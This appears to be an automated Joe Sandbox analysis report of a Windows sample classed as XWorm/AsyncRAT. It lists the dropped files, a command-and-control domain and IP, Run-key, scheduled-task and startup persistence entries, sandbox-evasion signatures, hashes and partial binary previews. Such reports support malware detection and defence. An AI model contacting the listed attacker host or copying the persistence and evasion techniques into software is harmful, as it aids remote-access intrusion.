                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585127 Sample: YPzNsfg4nR.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 52 usb-alignment.gl.at.ply.gg 2->52 54 ip-api.com 2->54 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 12 other signatures 2->68 9 YPzNsfg4nR.exe 7 2->9         started        13 coding 2->13         started        15 svchost.exe 2->15         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 48 C:\Users\user\Desktop\24572628.exe, PE32 9->48 dropped 50 C:\Users\user\AppData\...\YPzNsfg4nR.exe.log, CSV 9->50 dropped 78 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->78 20 24572628.exe 15 6 9->20         started        25 conhost.exe 9->25         started        80 Antivirus detection for dropped file 13->80 82 Multi AV Scanner detection for dropped file 13->82 84 Machine Learning detection for dropped file 13->84 60 127.0.0.1 unknown unknown 15->60 file6 signatures7 process8 dnsIp9 56 usb-alignment.gl.at.ply.gg 147.185.221.21, 39219, 49999, 50007 SALSGIVERUS United States 20->56 58 ip-api.com 208.95.112.1, 49743, 80 TUT-ASUS United States 20->58 46 C:\ProgramData\coding, PE32 20->46 dropped 70 Antivirus detection for dropped file 20->70 72 Multi AV Scanner detection for dropped file 20->72 74 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->74 76 7 other signatures 20->76 27 powershell.exe 22 20->27         started        30 powershell.exe 23 20->30         started        32 powershell.exe 23 20->32         started        34 2 other processes 20->34 file10 signatures11 process12 signatures13 86 Loading BitLocker PowerShell Module 27->86 36 conhost.exe 27->36         started        38 conhost.exe 30->38         started        40 conhost.exe 32->40         started        42 conhost.exe 34->42         started        44 conhost.exe 34->44         started        process14

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    YPzNsfg4nR.exe17%VirustotalBrowse
                    YPzNsfg4nR.exe8%ReversingLabs
                    YPzNsfg4nR.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\ProgramData\coding100%AviraTR/Spy.Gen
                    C:\Users\user\Desktop\24572628.exe100%AviraTR/Spy.Gen
                    C:\ProgramData\coding100%Joe Sandbox ML
                    C:\Users\user\Desktop\24572628.exe100%Joe Sandbox ML
                    C:\ProgramData\coding92%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                    C:\Users\user\Desktop\24572628.exe92%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://ion=v4.5n0%Avira URL Cloudsafe
                    usb-alignment.gl.at.ply.gg100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ip-api.com
                    		208.95.112.1
                    		truefalse
                      		high
                      usb-alignment.gl.at.ply.gg
                      		147.185.221.21
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        usb-alignment.gl.at.ply.ggtrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://ip-api.com/line/?fields=hostingfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://g.live.com/odclientsettings/Prod/C:edb.log.19.dr, qmgr.db.19.drfalse
                            		high
                            http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2349698693.0000017045FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2458610974.000001A290075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2614120753.0000021EE0183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://crl.mpowershell.exe, 00000008.00000002.2481707420.000001A2F4839000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.2331273020.0000017036199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2331273020.0000017036199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 0000000B.00000002.2639330504.0000021EE8762000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2349698693.0000017045FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2458610974.000001A290075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2614120753.0000021EE0183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Licensepowershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.micpowershell.exe, 0000000B.00000002.2641179501.0000021EE87F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/Iconpowershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crl.ver)svchost.exe, 00000013.00000002.3423579528.00000284AE4BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000013.00000003.3002178502.00000284B3A70000.00000004.00000800.00020000.00000000.sdmp, edb.log.19.dr, qmgr.db.19.drfalse
                                                        		high
                                                        http://crl.micft.cMicRosofpowershell.exe, 0000000B.00000002.2641179501.0000021EE87F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://aka.ms/pscore68powershell.exe, 00000004.00000002.2331273020.0000017035F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C1052E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.microsoft.cpowershell.exe, 00000008.00000002.2481707420.000001A2F4839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ion=v4.5npowershell.exe, 0000000B.00000002.2639330504.0000021EE878B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name24572628.exe, 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2331273020.0000017035F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C1052E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crl.microspowershell.exe, 00000008.00000002.2481707420.000001A2F4839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    208.95.112.1
                                                                    		ip-api.comUnited States
                                                                    		53334TUT-ASUSfalse
                                                                    147.185.221.21
                                                                    		usb-alignment.gl.at.ply.ggUnited States
                                                                    		12087SALSGIVERUStrue

                                                                    Private

                                                                    IP
                                                                    127.0.0.1

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1585127
                                                                    Start date and time:2025-01-07 05:59:11 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 8m 6s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:22
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:YPzNsfg4nR.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:691c8281d68680d1f8966d657bfbcf4d100c7a70d6894493946793cc320623a6.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.evad.winEXE@24/28@2/3
                                                                    EGA Information:
                                                                    • Successful, ratio: 12.5%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 86
                                                                    • Number of non-executed functions: 5
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                    • Excluded IPs from analysis (whitelisted): 40.126.32.134, 40.126.32.138, 40.126.32.140, 40.126.32.76, 40.126.32.136, 20.190.160.14, 20.190.160.22, 40.126.32.72, 23.56.254.164, 13.107.246.45, 52.149.20.212, 23.1.237.91
                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                    • Execution Graph export aborted for target YPzNsfg4nR.exe, PID 7332 because it is empty
                                                                    • Execution Graph export aborted for target coding, PID 5384 because it is empty
                                                                    • Execution Graph export aborted for target coding, PID 8084 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 2504 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 4308 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 7704 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 8008 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    00:00:19API Interceptor1x Sleep call for process: YPzNsfg4nR.exe modified
                                                                    00:00:28API Interceptor62x Sleep call for process: powershell.exe modified
                                                                    00:01:27API Interceptor76x Sleep call for process: 24572628.exe modified
                                                                    00:01:37API Interceptor2x Sleep call for process: OpenWith.exe modified
                                                                    00:01:38API Interceptor2x Sleep call for process: svchost.exe modified
                                                                    06:01:28Task SchedulerRun new task: coding path: C:\ProgramData\coding
                                                                    06:01:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run coding C:\ProgramData\coding
                                                                    06:01:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run coding C:\ProgramData\coding
                                                                    06:01:45AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coding.lnk

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    208.95.112.1SAL987656700.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • ip-api.com/line/?fields=hosting
                                                                    Resource.exeGet hashmaliciousBlank GrabberBrowse
                                                                    • ip-api.com/json/?fields=225545
                                                                    P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                                                    • ip-api.com/line/?fields=hosting
                                                                    BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                                                    • ip-api.com/line/?fields=hosting
                                                                    SharkHack.exeGet hashmaliciousXWormBrowse
                                                                    • ip-api.com/line/?fields=hosting
                                                                    paint.exeGet hashmaliciousBlank GrabberBrowse
                                                                    • ip-api.com/json/?fields=225545
                                                                    X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                    • ip-api.com/json/?fields=225545
                                                                    KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                                                    • ip-api.com/json/?fields=225545
                                                                    9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                    • ip-api.com/json/?fields=225545
                                                                    riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                    • ip-api.com/json/?fields=225545
                                                                    147.185.221.21Nurcraft.exeGet hashmaliciousXWormBrowse
                                                                      Zvas34nq1T.exeGet hashmaliciousXWormBrowse
                                                                        aoKTzGQSRP.exeGet hashmaliciousXWormBrowse
                                                                          SecuriteInfo.com.Trojan.DownLoad4.16832.13675.15683.exeGet hashmaliciousSheetRatBrowse
                                                                            mIURiU8n2P.exeGet hashmaliciousXWormBrowse
                                                                              PixpFUv4G7.exeGet hashmaliciousQuasar, XWormBrowse
                                                                                r4RF3TX5Mi.exeGet hashmaliciousXWormBrowse
                                                                                  ra66DSpa.exeGet hashmaliciousXWormBrowse
                                                                                    Q5N7WOpk8J.batGet hashmaliciousUnknownBrowse
                                                                                      NzEsfIiAc0.exeGet hashmaliciousXWormBrowse

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        ip-api.comSAL987656700.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        Resource.exeGet hashmaliciousBlank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                                                                        • 208.95.112.1
                                                                                        BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                                                                        • 208.95.112.1
                                                                                        SharkHack.exeGet hashmaliciousXWormBrowse
                                                                                        • 208.95.112.1
                                                                                        paint.exeGet hashmaliciousBlank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                                        • 208.95.112.1

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        TUT-ASUSSAL987656700.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        Resource.exeGet hashmaliciousBlank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                                                                        • 208.95.112.1
                                                                                        BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                                                                        • 208.95.112.1
                                                                                        SharkHack.exeGet hashmaliciousXWormBrowse
                                                                                        • 208.95.112.1
                                                                                        paint.exeGet hashmaliciousBlank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        SALSGIVERUSsela.exeGet hashmaliciousNjratBrowse
                                                                                        • 147.185.221.17
                                                                                        P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                                                                        • 147.185.221.24
                                                                                        BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                                                                        • 147.185.221.24
                                                                                        SharkHack.exeGet hashmaliciousXWormBrowse
                                                                                        • 147.185.221.24
                                                                                        avaydna.exeGet hashmaliciousNjratBrowse
                                                                                        • 147.185.221.24
                                                                                        ddos tool.exeGet hashmaliciousXWormBrowse
                                                                                        • 147.185.221.24
                                                                                        L988Ph5sKX.exeGet hashmaliciousXWormBrowse
                                                                                        • 147.185.221.24
                                                                                        ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                                                        • 147.185.221.24
                                                                                        p59UXHJRX3.exeGet hashmaliciousXenoRATBrowse
                                                                                        • 147.185.221.24
                                                                                        JdYlp3ChrS.exeGet hashmaliciousNjratBrowse
                                                                                        • 147.185.221.24

                                                                                        JA3 Fingerprints

                                                                                        No context

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.8306986570839627
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugP:gJjJGtpTq2yv1AuNZRY3diu8iBVqFl
                                                                                        MD5:8ABC3C15385F6D906DDA7E590F452109
                                                                                        SHA1:7D117E7F8DBBD2F633DF41AF8A76254C89FDBC97
                                                                                        SHA-256:5D48FBCA13BD6C0EB4DB736FEB84BF82AA72B9F1DBB5E4CBA8607CCD6679DDCD
                                                                                        SHA-512:826826CAB53E2AD15FE0FFC328CDC319483F7E15D7DB20B6FCAE13DD96B2818AC42F9762BA7CB065BB5C7828017FAFE6FAB0CEDA6094136E3A8F186034BC92F4
                                                                                        Malicious:false
                                                                                        Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf50580ab, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.6585129248590262
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:RSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Raza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                        MD5:87F796CC76262B0391D1D761DC2D7679
                                                                                        SHA1:D8D62E8BBCFCF6CB68E479F0AD9F32A5E4DBF10E
                                                                                        SHA-256:CF50BC048AFA31C6F52099E7F92439771513C9A1408EA724CD7CF41F059D36D7
                                                                                        SHA-512:7EE62067622F93E808E02202CB55BC7F79D0EFB7D7804788D404718B744C13CC38C9E1575CC972CB7CF1E30CDAAF6B9111605468C5759AA65995FCA7AABC87F4
                                                                                        Malicious:false
                                                                                        Preview:....... ...............X\...;...{......................0.z..........{..&....}i.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{....................................9&....}i....................4&....}i..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.0811685372172786
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H4tlKYe0MqmkbGuAJkhvekl1ogiqz/l/ollrekGltll/SPj:YKzB7GrxlCnelAJe3l
                                                                                        MD5:3D64F21AF3E3AA040948D0375FFC3321
                                                                                        SHA1:5648097E4332C01A777334E4F22259F937019034
                                                                                        SHA-256:DAC8A750286465C2A4D10BDB8E434D4CB92F18A0F5203803DC1991AD7050CAF9
                                                                                        SHA-512:EC59FFACD5B3D75E8B308699D34DADD7DCF07E61D599ABB038EF02A8F29B6292C301B9916BCAF069F0DD59809D3307D53D32DB25FAFF27187588C2E7C6A64B8D
                                                                                        Malicious:false
                                                                                        Preview:........................................;...{..&....}i......{...............{.......{...XL......{.....................4&....}i.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\coding

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\24572628.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):75776
                                                                                        Entropy (8bit):5.94947504067525
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:z1fsaWa6B6zIJgfxtrjSvbqpU+CgEEL6DQrGR8mOOrxkajucVB:RfsaWajIJi6bq2lEprGiONkaju+B
                                                                                        MD5:FFD51738DC3483954A7BCDFAF713DB10
                                                                                        SHA1:3B643A4AD443A5EF249B1C02D0CDB927F5AE38E6
                                                                                        SHA-256:6A2BDC82837DA65C36AF89091F9B1282AE735DED04985BA44759466E4F47C394
                                                                                        SHA-512:67B5AC3FDB9C771F13603D9D78461751172A71EB6B236A55A7BA9C51D96B98C79A615D13F677317189007BA24F452B1B53B31356ACB25913BCEEA6313D84D452
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\coding, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\coding, Author: Joe Security
                                                                                        • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\ProgramData\coding, Author: Sekoia.io
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\coding, Author: ditekSHen
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................<... ...@....@.. ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B.................<......H........b..........&.....................................................(....*.r...p*. C~..*..(....*.ry..p*. ....*.s.........s.........s.........s.........*.r...p*. y.".*.ri..p*. ....*.r...p*. *p{.*.rY..p*. .O..*.r...p*. /?..*..((...*.r!..p*. .H..*.r{..p*. ..e.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. S...*.r?..p*.r...p*. 9/T.*.r...p*. ....*.rM..p*. E/..*.r...p*. ....*.r...p*.r[.

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\YPzNsfg4nR.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\YPzNsfg4nR.exe
                                                                                        File Type:CSV text
                                                                                        Category:dropped
                                                                                        Size (bytes):425
                                                                                        Entropy (8bit):5.357964438493834
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                                                                        MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                                                                        SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                                                                        SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                                                                        SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                                                                        Malicious:true
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\coding.log

                                                                                        Download File
                                                                                        Process:C:\ProgramData\coding
                                                                                        File Type:CSV text
                                                                                        Category:dropped
                                                                                        Size (bytes):654
                                                                                        Entropy (8bit):5.380476433908377
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.34726597513537405
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlll:Nll
                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
